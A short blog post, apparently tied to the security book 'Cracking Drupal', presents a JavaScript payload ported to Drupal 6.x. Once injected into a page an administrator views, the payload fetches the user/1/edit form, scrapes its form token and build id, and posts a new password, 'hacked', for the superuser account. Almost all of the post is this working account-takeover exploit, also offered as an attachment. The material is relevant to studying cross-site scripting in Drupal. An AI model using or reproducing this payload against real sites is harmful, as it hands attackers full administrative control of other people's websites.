Update UID1 Password Via Javascript - Ported to Drupal 6.x

Heine Deelstra created a script to update UID 1 password via JavaScript. This script needed some updating to work with Drupal 6.x and since my book - Cracking Drupal is primarily about Drupal 6.x I updated the script. You will find the script attached and presented below:

// Test for  the presence of jquery.
if (typeof jQuery == 'function') {
// Fetch a correct token from user/1/edit because we will need it to
// successfully submit the user edit form later.
// TODO: Include a check to increase the chance that the current user is admin,
// which will reduce the number of access denied error messages in the log.
jQuery.get(Drupal.settings.basePath + 'user/1/edit',
  function (data, status) {
    if (status == 'success') {
      // Extract the token and other required data
      var matches = data.match(/id="edit-name" size="[0-9]*" value="([a-z0-9]*)"/);
      var name = matches[1];
      var matches = data.match(/id="edit-mail" size="[0-9]*" value="([a-z0-9]*@[a-z0-9]*.[a-z0-9]*)"/);
      var mail = matches[1];
      var matches = data.match(/id="edit-user-profile-form-form-token" value="([a-z0-9]*)"/);
      var token = matches[1];
      var matches = data.match(/name="form_build_id" id="(form-[a-z0-9]*)" value="(form-[a-z0-9]*)"/);
      var build_id = matches[1];
      // Post the minimum amount of fields. Other fields get their default values.
      var payload = {
        "name": name,
        "mail": mail,
        "form_id": 'user_profile_form',
        "form_token": token,
        build_id : build_id,
        "pass[pass1]": 'hacked',
        "pass[pass2]": 'hacked'
      };
      jQuery.post(Drupal.settings.basePath +  'user/1/edit', payload);
      }
    }
  );
}
AttachmentSize
uid1_changer.js.txt1.39 KB